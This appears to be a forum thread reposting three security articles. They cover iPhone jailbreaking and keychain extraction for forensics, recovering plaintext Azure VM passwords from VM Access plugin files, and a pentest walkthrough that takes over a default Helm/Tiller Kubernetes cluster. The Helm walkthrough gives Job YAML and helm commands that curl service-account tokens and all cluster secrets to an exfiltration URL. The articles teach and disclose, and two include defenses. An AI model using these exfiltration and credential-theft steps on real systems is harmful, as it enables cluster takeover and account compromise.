obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail. Launch iOS Forensic Toolkit.Make sure that both the iPhone and the license dongle are connected to your computer’s USB ports. iOS Forensic Toolkit is available from https://www.elcomsoft.com/eift.html Using iOS Forensic Toolkit, perform all steps for logical acquisition.iOS Forensic Toolkit supports what is frequently referred as “Advanced Logical Extraction”. During this process, you will make a fresh local backup, obtain device information (hardware, iOS version, list of installed applications), extract crash logs, media files, and shared app data. If the iOS device does not have a backup password, iOS Forensic Toolkit will set a temporarily password of ‘123’ in order to allow access to certain types of data (e.g. messages and keychain items).If a backup password is configured and you don’t know it, you may be able to reset the backup password on the device (iOS 11 and 12: the Reset All Settings command; passcode required), then repeat the procedure. However, since the Reset All Settings command also removes device passcode, you will lose access to Apple Pay transactions and some other data. Refer to “If you have to reset the backup password” for instructions. Prepare for jailbreaking and install a jailbreak Identify hardware and iOS version the device is running (iOS Forensic Toolkit > (I)nformation). Identify the correct jailbreak supporting the combination of device hardware and software.The following jailbreaks are available for recent versions of iOS:iOS 12 – 12.1.2 RootlessJB (recommended if compatible with hardware/iOS version as the least invasive): https://github.com/jakeajames/rootlessJBiOS 11.x – 12 – 12.1.2 unc0ver jailbreak (source code available): https://github.com/pwn20wndstuff/Undecimus iOS 12 – 12.1.2 Chimera jailbreak: https://chimera.sh/ Other jailbreaks exist. They may or may not work for the purpose of forensic extraction. Make sure you have an Apple Account that is registered in the Apple Developer Program (enrollment as a developer carries a yearly fee).Using an Apple Account enrolled in the Apple Developer Program allows sideloading an IPA while the device is offline and without manually approving the signing certificate in the device settings (which requires the device to connect to an Apple server).Note: a “personal” developer account is not sufficient for our purposes; you require a “corporate” developer account instead. Log in to your developer Apple Account and create an app-specific password.All Apple accounts enrolled in the Apple Developer Program are required to have Two-Factor Authentication. Since Cydia Impactor does not support two-factor authentication, an app-specific password is required to sign and sideload the jailbreak IPA. Launch Cydia Impactor and sideload the jailbreak IPA using the Apple ID and app-specific password of your Apple developer account.Note: Cydia will prompt about which signing certificate to use. Select the developer certificate from the list. Since you have signed the IPA file using your developer account, approving the signing certificate on the iOS device is not required. The iOS device will remain offline. Launch the jailbreak and follow the instructions. Note: we recommend creating a system snapshot if one is offered by the jailbreak. Troubleshooting jailbreaks Modern jailbreaks (targeting iOS 10 and newer) are relatively safe to use since they are not modifying the kernel. As a result, the jailbroken device will always boot in non-jailbroken state; a jailbreak must be reapplied after each reboot. Jailbreaks exploit chains of vulnerabilities in the operating system in order to obtain superuser privileges, escape the sandbox and allow the execution of unsigned applications. Since multiple vulnerabilities are consecutively exploited, the jailbreaking process may fail at any time. It is not unusual for jailbreaking attempts to fail from the first try. If the first attempt fails, you have the following options: Reattempt the jailbreak by re-running the jailbreak app. If this fails, reboot the device, unlock it with a passcode then wait for about 3 minutes to allow all background processes to start. Then reattempt the jailbreak. You may need to repeat Step 2 several times for the jailbreak to install. However, if the above procedure does not work after multiple attempts, we recommend trying a different jailbreak tool. For example, we counted no less than five different jailbreak tools for iOS 12.0-12.1.2, with some of them offering higher success rate on certain hardware (and vice versa). Some jailbreaks have specific requirements such as checking if an iOS update has been downloaded (and removing the downloaded update if it is there). Do check accompanying info. Troubleshooting iOS Forensic Toolkit If for any reason you have to close and restart iOS Forensic Toolkit, make sure to close the second window as well (the Secure channel window). If iOS Forensic Toolkit appears to be connected to the device but you receive unexpected results, close iOS Forensic Toolkit (both windows) and make sure that your computer is not connected to the Wi-Fi network. If it isn’t, try disabling the wired network connection as well since your computer may be operating on the same network with other iOS devices. Windows: the Windows version of iOS Forensic Toolkit will attempt to save extracted information to the folder where the tool is installed. While you can specify your own path to store data, it may be easier to move EIFT installation into a shorter path (e.g. x:\eift\). Mac: a common mistake is attempting to run iOS Forensic Toolkit directly from the mounted DMG image. Instead, create a local directory and copy EIFT to that location. If you have to reset the backup password If the iPhone backup is protected with an unknown password, you may be tempted to quickly reset that password by using the “Reset All Settings” command. We recommend using this option with care, and only after making a full local backup “as is”. Resetting “all settings” will also remove the device passcode, which means that iOS will wipe the types of data that rely on passcode protection. This includes Apple Pay transactions, downloaded Exchange messages and some other data. In order to preserve all of that evidence, we recommend the following acquisition sequence: Perform the complete logical acquisition sequence “as is” with iOS Forensic Toolkit (the backup, media files, crash logs, shared app data). Jailbreak the device and capture the keychain and file system image. If this is successful, the keychain will contain the backup password. Reset backup password: if you are unable to install a jailbreak and perform physical acquisition even after you follow the relevant troubleshooting steps, consider resetting the backup password and following logical acquisition steps again to capture the backup. Note that if you create the backup with iOS Forensic Toolkit after resetting the password, that backup will be protected with a temporary password of ‘123’. Extracting the backup password from the keychain If you have successfully performed physical acquisition, you already have the decrypted iOS keychain at your disposal. The keychain stores the backup password; you can use that backup password to decrypt the device backup. The backup password is stored in the “BackupAgent” item as shown on the following screen shot: On that screen shot, the backup password is “JohnDoe”. To discover that password, launch Elcomsoft Phone Breaker and select Explore keychain on the main screen. Click “Browse” > “Choose another” and specify path to the keychaindumpo.xml file extracted with iOS Forensic Toolkit. The keychain is always encrypted. The backup password is stored ThisDeviceOnly attribute, and can only be extracted via physical acquisition. Perform physical extraction Once the device has been jailbroken, it will be possible to extract the content of the file system, obtain and decrypt the keychain. Make sure that the iOS device remains in Airplane mode, and Wi-Fi, Bluetooth and Mobile data toggles are disabled. Make sure that your computer’s Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction.While it is not immediately obvious, we strongly recommend disabling Wi-Fi connectivity on your computer if it has one. If you keep Wi-Fi enabled on your computer and there is another iOS device on the network, iOS Forensic Toolkit may accidentally connect to that other device, and the extraction will fail. Make sure the iOS device has been paired to the computer (or that you have a valid pairing/lockdown file ready). Unlock iOS device and make sure its display is switched on. Connect the iOS device to the computer. Note: do not remove the passcode on the device! Otherwise, you will lose access to certain types of evidence such as Apple Pay transactions, downloaded Exchange mail and some other data. Launch iOS Forensic Toolkit. Use the (D)isable screen lock command from the main window to prevent the iOS device from automatically locking.This is required in order to access some elements of the file system that iOS tries to protect when the device is locked. Preventing screen lock is the simplest way to work around these protection measures. Extract the keychain (K)eychain. Extract file system image (F)ile system. Analyzing the data As a result of your acquisition efforts, you may have all or some of the following pieces of evidence: Information about the device (XML) and the list of installed apps (text file). Use any XML or text viewer to analyze. A local backup in iTunes format. If you have followed the guideline, the backup will be encrypted with a password, and the password is ‘123’. You can open the backup in any forensic tool that supports iTunes backups such as Elcomsoft Phone Viewer. In order to analyze the keychain, you’ll have to open the backup with Elcomsoft Phone Breaker. Crash logs. You can analyze these using a text editor. Alternatively, refer to the following work about log file analysys: iOS Sysdiagnose Research (scripts: iOS sysdiagnose forensic scripts). Media files. Use any gallery or photo viewer app. You may want to use a tool that can extract EXIF information and, particularly, the geotags in order to re-create the suspect’s location history. The article iOS Photos.sqlite Forensics is also worth reading! Shared files. These files can be in any format, most commonly plist, XML or SQLite. Keychain (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Breaker. The keychain contains passwords the user saved in Safari, system and third-party apps. These passwords can be used to sign in to the user’s mail and social network accounts. The passwords can be also used to create a highly targeted custom dictionary for attacking encrypted documents and full disk encryption with tools such as Elcomsoft Distributed Password Recovery. File system image (extracted with iOS Forensic Toolkit). Analyze with Elcomsoft Phone Viewer or unpack the TAR file and analyze manually or using your favorite forensic tool. Sursa: https://blog.elcomsoft.com/2019/05/step-by-step-guide-to-ios-jailbreaking-and-physical-acquisition/
-
March 19, 2018BY DANIEL GOLDBERG AND OFRI ZIV3 COMMENTS Azure provides an incredible amount of add-on services for its IaaS offerings. These services are provided by the Azure Guest Agent through a large collection of plugins such as Chef integration, a Jenkins interface, a diagnostic channel for apps running inside the machine and many more. While researching the Azure Guest Agent, we’ve uncovered several security issues which have all been reported to Microsoft. This post will focus on a security design flaw in the VM Access plugin that may enable a cross platform attack impacting every machine type provided by Azure. Get PDF Version Password Harvesting Tool Simply put, attackers can recover plaintext administrator passwords from machines by abusing the VM Access plugin. These may be reused to access different services, machines and databases. Keeping plaintext credentials can also violate key compliance regulations such as PCI-DSS and others. Microsoft has dismissed this issue and replied as follows : “…the way the agent & extension handlers work is by design.” In this post, we’ll cover the technical details of how the VM Access plugin works and how we managed to abuse this design flaw to recover “secure”plaintext data. Mitigation for this issue will also be discussed. The Azure VM Access plugin One of the many plugins Azure provides is VM Access, a plugin that helps recover access to machines that users have been inadvertently locked out from accessing. This can be the result of mistakes while configuring the machine or because the login credentials have been forgotten. Azure allows users to reset both the machine configuration and the password of any local user. Due to the sensitive nature of credentials handling, we decided to take a closer look at this plugin. Password credentials are a valuable target for attackers, as credential reuse is a constant thorn in many organisations security posture. In recent Windows releases, credential storage has been repeatedly hardened and since Windows 8.1 and Windows Server 2012, Windows hasn’t been keeping plaintext passwords at all. Plaintext passwords are even more valuable for attackers as even minor manipulations on passwords can open multiple doors. We’ve discovered that since late 2015, attackers have been able to recover plaintext credentials after breaching and take over an Azure virtual machine if the VM Access plugin was used at any point on that machine. Let’s take a quick look at the Azure Guest Agent and assemble the pieces to understand how the plaintext password can be extracted. How the Azure Guest Agent works Azure offers a rich plugin system enabling developers and administrators to interact with virtual machines. The core of this functionality is a cross platform agent, built into every marketplace that provides virtual machine images. This agent is a background service that continually communicates with a controller (part of the Azure infrastructure), receives tasks to execute, performs them and reports back. At the highest level, the administrator, using the Azure portal or API, provides an operation to be executed on the guest virtual machine. The Azure infrastructure then provides the Guest Agent the requested configuration and if required, the plugin to execute it. For example, if the administrator wants to collect specific diagnostics from a machine, Azure provides a plugin package named IaaSDiagnostics and a configuration file with the parameters encoded inside. Plugin Configuration Files The communication between the controller and the Guest Agent occurs over plain HTTP and an XML based protocol. Each configuration is transmitted as a JSON data structure wrapped in XML and only the raw JSON is stored on disk. The JSON format is identical across all the extensions and is similar to the following data (taken from an VMAccess configuration, version 2.4.2) – This data is saved in: C:PackagesPlugins<PluginName>RuntimeSettings This folder is readable by any user but writable only by administrators. For example, the configuration file above was saved in : C:PackagesPluginsMicrosoft.Compute.VMAccessAgent2.4.2RuntimeSettings.settings From our perspective, the important part of this configuration file is the sensitive data (such as passwords), which is encrypted and encoded as a Base64 string and stored in protectedSettings. The sensitive data is encrypted using a certificate generated for communication between the Guest Agent and Azure, given to Azure by the Guest Agent. To read the data encrypted by Azure, the plugin decodes the Base64 data and using the certificate specified by the thumbprint, decrypts the content. On Windows this certificate is saved in the registry under HKLM/Software/Microsoft/SystemCertificates accessible only to administrators and the operating system itself. Recovering Plaintext Data Now we have all the ingredients needed to recover plaintext data. The new password, provided by the administrator through the Azure portal, is saved in the protectedSettings section in the configuration file that was passed to the Guest Agent running on the guest machine. This file is saved to disk containing the new password as a plaintext string first encrypted then base64 encoded. Once an attacker breaches a machine and successfully escalates privileges, any certificate stored on the machine can be accessed. At that point, all that’s required is reading the base64 encrypted data, finding the certificate using the supplied thumbprint and ta-da – the data is successfully recovered. Here’s some simple C# code to decode this data using available Microsoft APIs: Compiling this code with a small wrapping will easily recover passwords in Windows. In Linux the vulnerability is the same and the data can be extracted with a few shell commands running as root. Successful execution on a Linux machine For an attacker to successfully execute this attack, two conditions are required: The VM Access plugin must be used to reset a user’s password. A method to read the certificate file using root/administrator permissions. While privilege escalation may not be trivial, reports about escalation methods are published from time to time. For example, nearly a year ago Microsoft closed a trivial privilege escalation in the Azure Guest Agent on Windows that could give attackers full control of the victim’s system. We’ll have more on this in our next post. Bypassing defenses as if they don’t exist A key effort in the past few years is ensuring that even if attackers compromise a machine, they cannot easily recover passwords or use any stored credentials. This is crucial as one of the most common methods to propagate across networks is stealing and reusing credentials. Every operating system provides this guarantee in a different fashion, but at bare minimum this consists of storing only password hashes. In addition, storing plain passwords is forbidden by many compliance standards, such as the PCI and SWIFT. When it comes to Windows protection, Microsoft has put great efforts into hardening credential storage in Windows and thwarting credential stealing and other attacks – such as Pass the Hash, weaponised by Mimikatz. Over multiple Windows releases, the password storage has been hardened, culminating in Credential Guard – introduced in Windows 10. With the VM Access plugin, none of this hardening is relevant. Diagnosis and Mitigation Based on the code provided above, we wrote a diagnostic tool (code available on Github, binary available here) to help check which plaintext credentials are stored on an Azure Windows machine. The tool checks for existing VM Access configuration files and if any exists, it displays the recovered credentials. Run the program inside an Administrator command prompt like in the following example: Result of a successful recovery If you’ve ever used the VM Access plugin, we recommend that you consider the password to be compromised and change it, without using the plugin. If possible, avoid using the VM Access plugin to reset VM passwords. If you still prefer using the plugin we suggest deleting the configuration files under C:PackagesPluginsMicrosoft.Compute.VmAccessAgentRuntimeSettings after the plugin has finished running, to minimise the time the passwords are written to disk. A sample powershell command could be rm -Recurse -Force C:PackagesPluginsMicrosoft.Compute.VmAccessAgent2.4.2RuntimeSettings*.settings The equivalent shell command in Linux is sudo rm -f /var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config Summary Using this design flaw, an attacker can bypass modern security controls quite easily. An attacker with privileged access to a locked down Windows Server 2016 machine with Credential Guard installed can acquire the plaintext password of an administrator user within a few seconds. This is made possible simply because the Password Recovery mechanism was used, a mechanism delivered by none other than… Azure. An attacker can then attempt to move laterally across the network through password reuse (a common problem with many organizations) and take over additional services. While this attack requires high privileges, privilege escalation vulnerabilities are routinely discovered. We will show an attack leveraging the Azure Guest Agent in a future post. Lastly, our only reply to Microsoft’s claim of “by design” is why store passwords using reversible encryption in 2018? More on the implications of the attack and how the Infection Monkey can help, read here. Sursa: https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/
-
Attacking default installs of Helm on Kubernetes 28 JANUARY 2019 on pentest, kubernetes, helm, tiller, gke EMAIL TWITTER REDDIT Table of Contents Intro tl;dr Disclaimer Installing the Environment Set up GKE Installing Helm+Tiller Creating the service account Initialize Helm Installing Wordpress Exploiting a Running Pod Post Exploitation Service Reconaissance Abusing tiller-deploy Talking gRPC to Tiller Stealing secrets with Helm and Tiller Stealing a service account token Stealing all secrets from Kubernetes Using service account tokens Defenses Intro I have totally fallen down the Kubernetes rabbit hole and am really enjoying playing with it and attacking it. One thing I've noticed is although there are a lot of great resources to get up and running with it really quickly, there are far fewer that take the time to make sure it's set up securely. And a lot of these tutorials and quick-start guides leave out important security options for the sake of simplicity. In my opinion, one of the biggest offenders of this is Helm, the "package manager for Kubernetes". There are countless tutorials and Stack Overflow answers that completely gloss over the security recommendations and take steps that really put the entire cluster at risk. More and more organizations I've talked to recently actually seem to be ditching the cluster side install of Helm ("Tiller") entirely for security reasons, and I wanted to explore and explain why. In this post, I'll set up a default GKE cluster with Helm and Tiller, then walk through how an attacker who compromises a running pod could abuse the lack of security controls to completely take over the cluster and become full admin. tl;dr The "simple" way to install Helm requires cluster-admin privileges to be given to its pod, and then exposes a gRPC interface inside the cluster without any authentication. This endpoint allows any compromised pod to deploy arbitrary Kubernetes resources and escalate to full admin. I wrote a few Helm charts that can take advantage of this here: https://github.com/ropnop/pentest_charts Disclaimer This post in only meant to practically demonstrate the risks involved in not enabling the security features for Helm. These are not vulnerabilities in Helm or Tiller and I'm not disclosing anything previously unknown. My only hope is that by laying out practical attacks, people will think twice about configuring loose RBAC policies and not enabling mTLS for Tiller. Installing the Environment To demonstrate the attack, I'm going to set up a typical web stack on Kubernetes using Google Kubernetes Engine (GKE) and Helm. I'll be installing everything using just the defaults as found on many write-ups on the internet. If you want to just get to the attacking part, feel free to skip this section and go directly to "Exploiting a Running Pod" Set up GKE I've createad a new GCP project and will be using the command line tool to spin up a new GKE cluster and gain access to it: $ gcloud projects create ropnop-helm-testing #create a new project $ gcloud config set project ropnop-helm-testing #use the new project $ gcloud config set compute/region us-central1 $ gcloud config set compute/zone us-central1-c $ gcloud services enable container.googleapis.com #enable Kubernetes APIs Now I'm ready to create the cluster and get credentials for it. I will do it with all the default options. There are a lot of command line switches that can help lock down this cluster, but I'm not going to provide any: $ gcloud container clusters create ropnop-k8s-cluster After a few minutes, my cluster is up and running: Lastly, I get credentials and verify connectivity with kubectl: $ gcloud container clusters get-credentials ropnop-k8s-cluster #set up kubeconfig $ kubectl config get-clusters And everything looks good, time to install Helm and Tiller Installing Helm+Tiller Helm has a quickstart guide to getting up and running with Helm quickly. This guide does mention that the default installation is not secure and should only be used for non-production or internal clusters. However, several other guides on the internet skip over this fact (example1, example2). And several Stack Overflow answers I've seen just have copy/paste code to install Tiller with no mention of security. Again, I'll be doing a default installation of Helm and Tiller, using the "easiest" method. Creating the service account Since Role Based Access Control (RBAC) is enabled by default now on every Kubernetes provider, the original way of using Helm and Tiller doesn't work. The Tiller pod needs elevated permissions to talk the Kubernetes API. Fine grain controlling of service account permissions is tricky and often overlooked, so the "easiest" way to get up and running is to create a service account for Tiller with full cluster admin privileges. To create a service account with cluster admin privs, I define a new ServiceAccount and ClusterRoleBinding in YAML: apiVersion: v1 kind: ServiceAccount metadata: name: tiller namespace: kube-system --- apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: tiller roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: cluster-admin subjects: - kind: ServiceAccount name: tiller namespace: kube-system and apply it with kubectl: $ kubectl apply -f tiller-rbac.yaml This created a service account called tiller, generated a secret auth token for it, and gave the account full cluster admin privileges. Initialize Helm The final step is to initialize Helm with the new service account. Again, there are additional flags that can be provided to this command that will help lock it down, but I'm just going with the "defaults": $ helm init --service-account tiller Besides setting up our client, this command also creates a deployment and service in the kube-system namespace for Tiller. The resources are tagged with the label app=helm, so you can filter and see everything running: We can also see that the Tiller deployment is configured to use our cluster admin service account: $ kubectl -n kube-system get deployments -l 'app=helm' -o jsonpath='{.items[0].spec.template.spec.serviceAccount}' tiller Installing Wordpress Now it's time to use Helm to install something. For this scenario, I'll be installing a Wordpress stack from the official Helm repository. This is a pretty good example of how quick and powerful Helm can be. In one command we can get a full stack deployment of Wordpress including a persistent MySQL backend. $ helm install stable/wordpress --name mycoolblog With no other flags, Tiller deploys all the resources into the default namespace. The "name" field gets applied as a release label on the resource, so we can view all the resources that were created: Helm took care of exposing the port for us too via a LoadBalancer service, so if we visit the external IP listed, we can see that Wordpress is indeed up and running: And that's it! I've got my blog up and running on Kubernetes in no time. What could go wrong now? Exploiting a Running Pod From here on out, I am going to assume that my Wordpress site has been totally compromised and an attacker has gained remote code execution on the underlying pod. This could be through a vulnerable plugin I installed or a bad misconfiguration, but let's just assume an attacker got a shell. Note: for purposes of this scenario I'm just giving myself a shell on the pod directly with the following command $ kubectl exec -it mycoolblog-wordpress-5d6c7d5464-hl972 -- /bin/bash Post Exploitation After landing a shell, theres a few indicators that quickly point to this being a container running on Kubernetes: The file /.dockerenv exists - we're inside a Docker container Various kubernetes environment variables There's several good resources out there for various Kubernetes post-exploitation activities. I recommend carnal0wnage's Kubernetes master postfor a great round-up. Trying some of these techniques, though, we'll discover that the default GKE install is still fairly locked down (and updated against recent CVEs). Even though we can talk to the Kubernetes API, for example, RBAC is enabled and we can't get anything from it: Time for some more reconaissance Service Reconaissance By default, Kubernetes makes service discovery within a cluster easy through kube-dns. Looking at /etc/resolv.conf we can see that this pod is configured to use kube-dns: nameserver 10.7.240.10 search default.svc.cluster.local svc.cluster.local cluster.local us-central1-c.c.ropnop-helm-testing.internal c.ropnop-helm-testing.internal google.internal options ndots:5 Our search domains tell us we're in the default namespace (as well as inside a GKE project named ropnop-helm-testing). DNS names in kube-dns follow the format: <svc_name>.<namespace>.svc.cluster.local. Through DNS, for example, we can look up our MariaDB service that Helm created: $ getent hosts mycoolblog-mariadb 10.7.242.104 mycoolblog-mariadb.default.svc.cluster.local (Note: I'm using getent since this pod didn't have standard DNS tools installed - living off the land ftw ) Even though we're in the default namespace, it's important to remember that namespaces don't provide any security. By default, there are no network policies that prevent cross-namespace communication. From this position, we can query services that are running in the kube-system namespace. For example, the kube-dns service itself: $ getent hosts kube-dns.kube-system.svc.cluster.local 10.7.240.10 kube-dns.kube-system.svc.cluster.local Through DNS, it's possible to enumerate running services in other namespaces. Remember how Tiller created a service in kube-system? Its default name is 'tiller-deploy'. If we checked for that via a DNS lookup we'd see it exists and exactly where it's at: Great! Tiller is installed in this cluster. How can we abuse it? Abusing tiller-deploy The way that Helm talks with a kubernetes cluster is over gRPC to the tiller-deploy pod. The pod then talks to the Kubernetes API with its service account token. When a helm command is run from a client, under the hood a port forward is opened up into the cluster to talk directly to the tiller-deploy service, which always points to the tiller-deploy pod on TCP 44134. What this means is that for a user outside the cluster, they must have the ability to open port forwards into the cluster since port 44134 is not externally exposed. However, from inside the cluster, 44134 is available and the port forward is not needed. We can verify that the port is open by simply tryint to curl it: Since we didn't get a timeout, something is listening there. Curl fails though, since this endpoint is designed to talk gRPC, not HTTP. Knowing we can reach the port, if we can send the right messages, we can talk directly to Tiller - since by default, Tiller does not require any authentication for gRPC communication. And since in this default install Tiller is running with cluster-admin privileges, we can essentially run cluster admin commands without any authentication. Talking gRPC to Tiller All of the gRPC endpoints are defined in the source code in Protobuf format, so anyone can create a client to communicate to the API. But the easiest way to communicate with Tiller is just through the normal Helm client, which is a static binary anyway. On our compromised pod, we can download the helm binary from the official releases. To download and extract to /tmp: export HVER=v2.11.0 #you may need different version curl -L "https://storage.googleapis.com/kubernetes-helm/helm-${HVER}-linux-amd64.tar.gz" | tar xz --strip-components=1 -C /tmp linux-amd64/helm Note: You may need to download specific versions to match up the version running in the server. You'll see error messages telling you what version to get. The helm binary allows us to specify a direct address to Tiller with --host or with the HELM_HOST environment variable. By plugging in the discovered tiller-deploy service's FQDN, we can directly communicate with the Tiller pod and run arbitrary Helm commands. For example, we can see our previously installed Wordpress release! From here, we have full control of Tiller. We can do anything a cluster admin could normally do with Helm, including installing/upgrading/deleting releases. But we still can't "directly" talk to the Kubernetes API, so let's abuse Tiller to upgrade our privileges and become full cluster admin. Stealing secrets with Helm and Tiller Tiller is configured with a service account that has cluster admin privileges. This means that the pod is using a secret, privileged service token to authenticate with the Kubernetes API. Service accounts are generally only used for "non-human" interactions with the k8s API, however anyone in possession of the secret token can still use it. If an attacker compromises Tiller's service account token, he or she can execute any Kubernetes API call with full admin privileges. Unfortunately, the Helm API doesn't support direct querying of secrets or other resources. Using Helm, we can only create new releases from chart templates. Chart templates are very well documented and allow us to template out custom resources to deploy to Kubernetes. So we just need to craft a resource in a way to exfiltrate the secret(s) we want. Stealing a service account token When the service account name is known, stealing its token is fairly straightforward. All that is needed is to launch a pod with that service account, then read the value from /var/run/secrets/kubernetes.io/serviceaccount/token, where the token value gets mounted at creation. It's possible to just define a job to read the value and use curl to POST it to a listening URL: apiVersion: batch/v1 kind: Job metadata: name: tiller-deployer # something benign looking namespace: kube-system spec: template: spec: serviceAccountName: tiller # hardcoded service account name containers: - name: tiller-deployer # something benign looking image: byrnedo/alpine-curl command: ["curl"] args: ["-d", "@/var/run/secrets/kubernetes.io/serviceaccount/token", "$(EXFIL_URL)"] env: - name: EXFIL_URL value: "https://<listening_url>" # replace URL here restartPolicy: Never backoffLimit: 5 Of course, since we don't hace access to the Kubernetes API directly and are using Helm, we can't just send this YAML - we have to send a Chart. I've created a chart to run the above job: https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_sa_token This chart is also packaged up and served from a Chart Repo here: https://ropnop.github.io/pentest_charts/ This Chart takes a few values: name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer") serviceAccountName - the service account to use (and therefore the token that will be exfil'd) exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack) namespace - defaults to kube-system, but you can override it To deploy this chart and exfil the tiller service account token, we have to first "initialize" Helm in our pod: $ export HELM_HOME=/tmp/helmhome $ /tmp/helm init --client-only Once it initializes, we can deploy the chart directly and pass it the values via command line: $ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134 $ /tmp/helm install --name tiller-deployer \ --set serviceAccountName=tiller \ --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" \ --repo https://ropnop.github.io/pentest_charts exfil_sa_token Our Job was successfully deployed: And I got the tiller service account token POSTed back to me in Slack After the job completes, it's easy to clean up everything and delete all the resources with Helm purge: $ /tmp/helm delete --purge tiller-deployer Stealing all secrets from Kubernetes While you can always use the "exfil_sa_token" chart to steal service account tokens, it's predicated on one thing: you know the name of the service account. In the above case, an attacker would have to pretty much guess that the service account name was "tiller", or the attack wouldn't work. In this scenario, since we don't have access to the Kubernetes API to query service accounts, and we can't look it up through Tiller, there's no easy way to just pull out a service account token if it has a unique name. The other option we have though, is to use Helm to create a new, highly privileged service account, and then use that to extract all the other Kubnernetes secrets. To accomplish that, we create a new ServiceAccount and ClusterRoleBinding then attach it to a new job that extracts all Kubernetes secrets via the API. The YAML definitions to do that would look something like this: --- apiVersion: v1 kind: ServiceAccount metadata: name: tiller-deployer #benign looking service account namespace: kube-system --- apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: tiller-deployer roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: cluster-admin # full cluster-admin privileges subjects: - kind: ServiceAccount name: tiller-deployer namespace: kube-system --- apiVersion: batch/v1 kind: Job metadata: name: tiller-deployer # something benign looking namespace: kube-system spec: template: spec: serviceAccountName: tiller-deployer # newly created service account containers: - name: tiller-deployer # something benign looking image: rflathers/kubectl:bash # alpine+curl+kubectl+bash command: - "/bin/bash" - "-c" - "curl --data-binary @<(kubectl get secrets --all-namespaces -o json) $(EXFIL_URL)" env: - name: EXFIL_URL value: "https://<listening_url>" # replace URL here restartPolicy: Never In the same vein as above, I packaged the above resources into a Helm chart: https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_secrets This Chart also takes the same values: name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer") serviceAccountName - the name of the cluster-admin service account to create and use (again, use something innocuous looking) exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack) namespace - defaults to kube-system, but you can override it When this chart is installed, it will create a new cluster-admin service account, then launch a job using that service account to query for every secret in all namespaces, and dump that data in a POST body back to EXFIL_URL. Just like above, we can launch this from our compromised pod: $ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134 $ export HELM_HOME=/tmp/helmhome $ /tmp/helm init --client-only $ /tmp/helm install --name tiller-deployer \ --set serviceAccountName="tiller-deployer" \ --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" \ --repo https://ropnop.github.io/pentest_charts exfil_secrets After Helm installs the chart, we'll get every Kubernetes secret dumped back to our exfil URL (in my case posted in Slack) And then make sure to clean up and remove the new service account and job: $ /tmp/helm delete --purge tiller-deployer With the secrets in JSON form, you can use jq to extract out plaintext passwords, tokens and certificates: cat all_secrets.json | jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]' And searching through that you can find the service account token tiller uses: Using service account tokens Now armed with Tiller's service account token, we can finally directly talk to the Kubernetes API from within our compromised pod. The token value needs to be added as a header in the request: Authorization: Bearer <token_here> $ export TOKEN="eyJhb...etc..." $ curl -k -H "Authorization: Bearer $TOKEN" https://10.7.240.1:443/ Working from within the cluster is annoying though, since it is always going to require us to execute commands from our compromised pod. Since this is a GKE cluster, we should be able to access the Kubernetes API over the internet if we find the correct endpoint. For GKE, you can pull data about the Kubernetes cluster (including the master endpoint) from the Google Cloud Metadata API from the compromised pod: $ curl -s -kH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | grep KUBERNETES_MASTER_NAME KUBERNETES_MASTER_NAME: 104.154.18.15 Armed with the IP address and Tiller's token, you can then configure kubectl from anywhere to talk to the GKE cluster on that endpoint: $ kubectl config set-cluster pwnedgke --server=https://104.154.18.15 $ kubectl config set-credentials tiller --token=$TILLER_TOKEN $ kubectl config set-context pwnedgke --cluster pwnedgke --user tiller $ kubectl config use-context pwnedgke $ kubectl --insecure-skip-tls-verify cluster-info Note: I'm skipping TLS verify because I didn't configure the cluster certificate For example, let's take over the GKE cluster from Kali: And that's it - we have full admin control over this GKE cluster There is a ton more we can do to maintain persistence (especially after dumping all the secrets previously), but that will remain a topic for future posts. Defenses This entire scenario was created to demonstrate how the "default" installation of Helm and Tiller (as well as GKE) can make it really easy for an attacker to escalate privileges and take over the entire cluster if a pod is compromised. If you are considering using Helm and Tiller in production, I stronglyrecommend following everything outlined here: https://github.com/helm/helm/blob/master/docs/securing_installation.md mTLS should be configured for Tiller, and RBAC should be as locked down as possible. Or don't create a Tiller service and require admins to do manual port forwards to the pod. Or ask yourself if you really need Tiller at all - I have seen more and more organizations simply abandon Tiller all together and just use Helm client-side for templating. For GKE, Google has a good writeup as well on securing a cluster for production: https://cloud.google.com/solutions/prep-kubernetes-engine-for-prod. Using VPCs, locking down access, filtering metadata, and enforcing network policies should be done at a minimum. Sadly, a lot of these security controls are hard to implement, and require a lot more effort and research to get right. It's not surprising to me then that a lot of default installations still make their way to production. Hope this helps someone! Let me know if you have any questions or want me to focus on anything more in the future. I'm hoping this is just the first of several Kubernetes related posts. -ropnop Sursa: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/
-
HUMBLE BOOK BUNDLE: HACKING 2.0 BY NO STARCH PRESS A great way to strengthen your computer skills is to learn what's going on underneath. Let No Starch Press be your guide with this book bundle! $475 WORTH OF AWESOME STUFF PAY $1 OR MORE DRM-FREE MULTI-FORMAT 19,130 BUNDLES SOLD Sursa: https://www.humblebundle.com/books/hacking-no-starch-press-books
-
